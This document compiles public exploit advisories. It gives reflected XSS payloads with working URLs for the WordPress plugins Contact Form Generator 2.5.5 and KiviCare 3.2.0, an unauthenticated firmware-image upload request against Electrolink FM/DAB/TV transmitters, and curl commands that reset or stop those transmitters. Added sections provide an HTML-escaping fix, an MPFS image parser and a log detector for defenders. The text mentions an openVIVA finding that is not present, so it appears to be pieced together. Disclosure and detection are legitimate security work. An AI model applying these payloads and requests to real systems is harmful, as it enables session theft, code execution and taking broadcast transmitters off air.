<pre><code># Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting<br /># Date: 03-10-2023<br /># Exploit Author: Arvandy<br /># Software Link: https://wordpress.org/plugins/contact-form-generator/<br /># Vendor Homepage: https://www.creative-solutions.net/<br /># Version: 2.5.5 <br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-37988<br /><br /># Product Description<br />Contact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/<br /><br /># Vulnerability overview:<br />The WordPress plugin Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.<br /><br /># Proof of Concept:<br />Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=<br />Affected Parameters: id<br />XSS Payload: "><script>alert(document.cookie)</script>x<br />http://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex<br /><br /># Recommendation<br />Upgrade to version 2.6.0<br /></code></pre>
<pre><code># Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting<br /># Date: 03-10-2023<br /># Exploit Author: Arvandy<br /># Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/<br /># Vendor Homepage: https://kivicare.io/<br /># Version: 3.2.0<br /># Tested on: Windows, Linux<br /># CVE: CVE-2023-2624<br /><br /># Product Description<br />KiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/<br /><br /># Vulnerability overview:<br />The WordPress plugin KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.<br /><br /># Proof of Concept:<br /><br />Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=<br />Affected Parameters: filterType<br />XSS Payload: <img src=x onerror=alert(document.cookie)><br />http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E<br /><br /># Recommendation<br />Upgrade to version 3.2.1<br /><br /></code></pre>
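The three cross-site scripting findings above (the stored 'Name' field in openVIVA c2, the reflected 'id' parameter in Contact Form Generator and the reflected 'filterType' parameter in KiviCare) share one root cause: request input is written into an HTML response without output encoding. As an added example, not code from any of the three products, the following Node.js snippet places the vulnerable interpolation next to a fixed version for the two contexts involved, a quoted attribute value (where the CFG payload breaks out with a leading quote) and element text (where the img and script payloads land), and checks that the advisories' own payloads become inert. The templates and the containsActiveContent check are constructed for the demonstration.

```javascript
// Added example, not code from Contact Form Generator, KiviCare or openVIVA.
// Runs on Node.js without any modules.

// Escape the characters that can terminate text content or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the parameter is concatenated into markup as-is.
function renderEditFormUnsafe(id) {
  return `<input type="hidden" name="id" value="${id}">`;
}
function renderNameListUnsafe(names) {
  return '<ul>' + names.map((n) => `<li>${n}</li>`).join('') + '</ul>';
}

// Fixed: every interpolation is escaped, and attribute values are always
// quoted (an unquoted attribute would need whitespace and '=' escaped too).
function renderEditForm(id) {
  return `<input type="hidden" name="id" value="${escapeHtml(id)}">`;
}
function renderNameList(names) {
  return '<ul>' + names.map((n) => `<li>${escapeHtml(n)}</li>`).join('') + '</ul>';
}

// Rough indicator used only to show the difference: a script tag, an img tag,
// or an on* event handler inside a tag, none of which the templates emit
// themselves. A real test would parse the HTML instead of pattern-matching.
function containsActiveContent(html) {
  return /<script\b|<img\b|<[a-z]+[^>]*\son[a-z]+\s*=/i.test(html);
}

// Payloads quoted from the three advisories above.
const PAYLOADS = {
  cfg: '"><script>alert(document.cookie)</script>x',
  kivicare: '<img src=x onerror=alert(document.cookie)>',
  openviva: "<script>alert('XSS')</script>",
};

// Render each payload through the vulnerable and the fixed template and
// report whether active content survived.
function demo() {
  const list = [PAYLOADS.kivicare, PAYLOADS.openviva];
  return {
    unsafeForm: containsActiveContent(renderEditFormUnsafe(PAYLOADS.cfg)),
    safeForm: containsActiveContent(renderEditForm(PAYLOADS.cfg)),
    unsafeList: containsActiveContent(renderNameListUnsafe(list)),
    safeList: containsActiveContent(renderNameList(list)),
  };
}
```

Two points follow from the contexts involved. The KiviCare endpoint is an admin-ajax.php route; a JSON endpoint should answer with Content-Type: application/json and X-Content-Type-Options: nosniff so that a reflected fragment is never interpreted as a document, on top of the encoding. And for the openVIVA case, escaping must happen where the stored name is rendered into the 'Vorgänge' list, not only where it is saved, because the same value may be rendered in several places.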
<pre><code><br />Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performance;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. 
High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. A digital deviation limiter together with<br />ASI and SDI inputs is available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device allows access to an unprotected endpoint that<br />allows MPFS File System binary image upload without authentication.<br />The MPFS2 file system module provides a light-weight read-only<br />file system that can be stored in external EEPROM, external<br />serial Flash, or internal Flash program memory. This file system<br />serves as the basis for the HTTP2 web server module, but is also<br />used by the SNMP module and is available to other applications<br />that require basic read-only storage capabilities. 
This can be<br />exploited to overwrite the flash program memory that holds the<br />web server's main interfaces and execute arbitrary code.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5796<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php<br /><br />Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html<br /><br />30.06.2023<br /><br />--<br /><br /><br />POST /upload HTTP/1.1<br />Host: 192.168.150.77:8888<br />Content-Length: 251<br />Cache-Control: max-age=0<br />Content-Type: multipart/form-data; boundary=----joxypoxy<br />User-Agent: MPFS2_PoC/1.0c<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: Login=IgnoreMePlsKtnx<br />Connection: close<br /><br />------joxypoxy<br />Content-Disposition: form-data; name="i"; filename="MPFSimg.bin"<br />Content-Type: application/octet-stream<br /><br />MPFS...<CGI BINARY PHONE HOME><br />-----joxypoxy--<br /><br /><br />HTTP/1.1 200 OK<br />Connection: close<br />Content-Type: text/html<br /><br /><html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html><br /><br /><br />---<br /><br />hd htm:<br />0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C....<br />2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d....<br />00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht<br />6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL<<br />...<br />...<br />64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..-<br /><br 
/>---<br /><br />MPFS Structure:<br /> [M][P][F][S]<br /> [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]<br /> [Name Hash 0][Name Hash 1]...[Name Hash N]<br /> [File Record 0][File Record 1]...[File Record N]<br /> [String 0][String 1]...[String N]<br /> [File Data 0][File Data 1]...[File Data N]<br /><br /><br />---<br /><br />C:\>javaw -jar MPFS2.jar<br />C:\>mpfs2 -v -l MPFSimg.bin<br />Version: 2.1<br />Number of files: 1 (1 regular, 0 index)<br />Number of dynamic variables: 0<br /><br />FileRecord 0:<br /> .StringPtr = 32 index0.htm<br /> .DataPtr = 43<br /> .Len = 48<br /> .Timestamp = 2023-08-27T14:39:30Z<br /> .Flags = 0<br /></code></pre>
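As an added example, not Zero Science Lab's or Microchip's code, here is a bounds-checked reader for the MPFS2 image layout listed above, the kind of check a defender can run on an image captured at the network edge or pulled from a proxy before it reaches the device. The header layout follows the advisory's "MPFS Structure" listing; the 22-byte file record layout (StringPtr, DataPtr, Len, Timestamp, Microtime, Flags, all little-endian) is inferred from the hex dump and from the offsets the mpfs2 tool reports (StringPtr 32, DataPtr 43, Len 48), and the Microtime field name is an assumption. The sample image is constructed in code with the same layout and the timestamp bytes from the dump; the name hash is treated as an opaque value and not recomputed.

```javascript
// Added example, not the advisory's or the vendor's code. Runs on Node.js
// using only the global Buffer class.

const MPFS_MAGIC = 'MPFS';
const RECORD_SIZE = 22;   // inferred from the dump: 5 x UInt32 + 1 x UInt16

// Read a NUL-terminated string, refusing to run off the end of the image.
function readCString(buf, offset, maxLen = 256) {
  let end = offset;
  while (end < buf.length && end - offset < maxLen && buf[end] !== 0) end++;
  if (end >= buf.length || buf[end] !== 0) throw new Error(`unterminated string at ${offset}`);
  return buf.toString('latin1', offset, end);
}

// Parse an image; every pointer is validated against the buffer, so a hostile
// image whose records point outside the data cannot cause out-of-range reads.
function parseMpfs(buf) {
  if (buf.length < 8 || buf.toString('latin1', 0, 4) !== MPFS_MAGIC) throw new Error('bad magic');
  const version = `${buf[4]}.${buf[5]}`;       // [BYTE Ver Hi][BYTE Ver Lo]
  const numFiles = buf.readUInt16LE(6);        // [WORD Number of Files]
  const hashBase = 8;                          // [Name Hash 0..N], one WORD each
  const recordBase = hashBase + 2 * numFiles;  // [File Record 0..N]
  if (recordBase + RECORD_SIZE * numFiles > buf.length) throw new Error('file table exceeds image');
  const files = [];
  for (let i = 0; i < numFiles; i++) {
    const r = recordBase + RECORD_SIZE * i;
    const rec = {
      nameHash: buf.readUInt16LE(hashBase + 2 * i),
      stringPtr: buf.readUInt32LE(r),
      dataPtr: buf.readUInt32LE(r + 4),
      len: buf.readUInt32LE(r + 8),
      timestamp: buf.readUInt32LE(r + 12),     // seconds since the Unix epoch
      microtime: buf.readUInt32LE(r + 16),     // assumed field name
      flags: buf.readUInt16LE(r + 20),
    };
    if (rec.stringPtr >= buf.length) throw new Error(`file ${i}: StringPtr out of range`);
    if (rec.dataPtr + rec.len > buf.length) throw new Error(`file ${i}: data out of range`);
    rec.name = readCString(buf, rec.stringPtr);
    rec.data = buf.subarray(rec.dataPtr, rec.dataPtr + rec.len);
    rec.modified = new Date(rec.timestamp * 1000).toISOString();
    files.push(rec);
  }
  return { version, numFiles, files };
}

// Constructed sample with the same layout as the dump above: version 2.1, one
// file named index0.htm, 48 bytes of HTML at offset 43. The hash and timestamp
// words are copied from the dump; the HTML body is made up.
function buildSampleImage() {
  const name = 'index0.htm';
  const data = Buffer.from('<html><title>ZSL</title><body>test</body></html>', 'latin1'); // 48 bytes
  const header = Buffer.alloc(8);
  header.write(MPFS_MAGIC, 0, 'latin1');
  header[4] = 2; header[5] = 1;                // version 2.1
  header.writeUInt16LE(1, 6);                  // one file
  const hash = Buffer.alloc(2);
  hash.writeUInt16LE(0x438a, 0);               // bytes "8a 43" in the dump
  const rec = Buffer.alloc(RECORD_SIZE);
  rec.writeUInt32LE(32, 0);                    // StringPtr: right after this record
  rec.writeUInt32LE(32 + name.length + 1, 4);  // DataPtr: after the NUL-terminated name
  rec.writeUInt32LE(data.length, 8);           // Len
  rec.writeUInt32LE(0x64eb4402, 12);           // bytes "02 44 eb 64" in the dump
  rec.writeUInt32LE(0, 16);                    // Microtime
  rec.writeUInt16LE(0, 20);                    // Flags
  return Buffer.concat([header, hash, rec, Buffer.from(name + '\0', 'latin1'), data]);
}
```

Run against the sample, parseMpfs reports version 2.1, one file, index0.htm at StringPtr 32 / DataPtr 43 / Len 48, matching the mpfs2 -v -l listing. The timestamp word 0x64eb4402 decodes to 2023-08-27T12:39:30Z, two hours earlier than the 14:39:30Z the mpfs2 tool printed for the same record, which suggests that tool shows local time with a Z suffix. The file-table and pointer checks are the part worth keeping: an image that claims more files or longer data than it contains is rejected before any byte of it is trusted.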
<pre><code><br />Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br />                  500W, 1kW, 2kW Medium DAB Transmitter<br />                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br />                  100W, 500W, 1kW, 2kW Compact FM Transmitter<br />                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br />                  15W - 40kW Digital FM Transmitter<br />                  BI, BIII VHF TV Transmitter<br />                  10W - 5kW UHF TV Transmitter<br />                  Web version: 01.09, 01.08, 01.07<br />                  Display version: 1.4, 1.2<br />                  Control unit version: 01.06, 01.04, 01.03<br />                  Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with the design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive product range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters' needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state-of-the-art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the-art DAB modulator with excellent performance;<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available in a compact 2U or<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. 
High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust design<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The transmitter is vulnerable to a Denial of Service (DoS).<br />An unauthenticated attacker can reset the board, as well as stop<br />the transmitter, by sending a single GET request to the command.cgi<br />gateway.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br />           Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5795<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)<br />Success! OK<br />C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)<br />Success! OK<br />C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)<br />Success! OK<br /></code></pre>
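Both Electrolink findings leave a trace a defender can key on: a GET for /command.cgi with web=r or web=K (reset and stop, the two that take the transmitter off air) and a POST to /upload answered with 200, the response the MPFS PoC received, from any source that is not a known management host. The detector below is an added example and not code from the advisory or the vendor. It assumes the requests were recorded in Common Log Format by a proxy or network tap in front of the transmitter (Appweb's own log format is not assumed), and the log lines it runs over are constructed for the demonstration.

```python
"""Flag unauthenticated command.cgi control requests and MPFS uploads in
access-log lines. Added example; not code from the advisory or the vendor.
Assumes Common Log Format input; sample lines below are constructed."""
import re
from typing import FrozenSet, Iterable, List, NamedTuple, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Common Log Format: src ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Values of the "web" parameter shown in the advisory's curl commands.
WEB_COMMANDS = {"r": "reset board", "K": "stop transmitter", "J": "start transmitter"}


class Alert(NamedTuple):
    ts: str
    src: str
    severity: str
    detail: str


def classify(method: str, target: str, status: str) -> Optional[Tuple[str, str]]:
    """Return (severity, detail) for a request worth alerting on, else None."""
    url = urlsplit(target)
    if url.path == "/command.cgi" and method == "GET":
        cmd = parse_qs(url.query).get("web", [""])[0]
        detail = "command.cgi web=%s (%s)" % (cmd, WEB_COMMANDS.get(cmd, "unknown command"))
        # Reset and stop knock the transmitter off air; anything else is still unauthenticated control.
        return ("high" if cmd in ("r", "K") else "medium"), detail
    if url.path == "/upload" and method == "POST":
        # A 200 on /upload is what the MPFS PoC got back on a successful update.
        return ("critical" if status == "200" else "high"), "MPFS image upload to /upload (status %s)" % status
    return None


def detect(lines: Iterable[str], management_hosts: FrozenSet[str] = frozenset()) -> List[Alert]:
    """Scan log lines; requests from allow-listed management hosts are ignored."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["src"] in management_hosts:
            continue
        hit = classify(m["method"], m["target"], m["status"])
        if hit:
            alerts.append(Alert(m["ts"], m["src"], hit[0], hit[1]))
    return alerts


# Constructed sample log (not captured from a real device): 192.168.150.1 plays
# the management workstation, 192.168.150.50 an unauthenticated attacker.
SAMPLE_LOG = [
    '192.168.150.1 - - [30/Jun/2023:10:11:58 +0200] "GET /index.htm HTTP/1.1" 200 4096',
    '192.168.150.1 - - [30/Jun/2023:10:12:01 +0200] "GET /command.cgi?web=J HTTP/1.1" 200 11',
    '192.168.150.50 - - [30/Jun/2023:10:12:07 +0200] "GET /command.cgi?web=r HTTP/1.1" 200 11',
    '192.168.150.50 - - [30/Jun/2023:10:12:09 +0200] "GET /command.cgi?web=K HTTP/1.1" 200 11',
    '192.168.150.50 - - [30/Jun/2023:10:13:44 +0200] "POST /upload HTTP/1.1" 200 98',
    '192.168.150.60 - - [30/Jun/2023:10:14:00 +0200] "GET /status.htm HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG, management_hosts=frozenset({"192.168.150.1"})):
        print(a.severity.upper(), a.ts, a.src, a.detail)
```

Because command.cgi performs the action on a single unauthenticated GET, there is no login event to correlate with; the source allow-list is doing the work the device's authentication should be doing, so keep it tight and alert on any command.cgi hit from outside it, not only on r and K.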
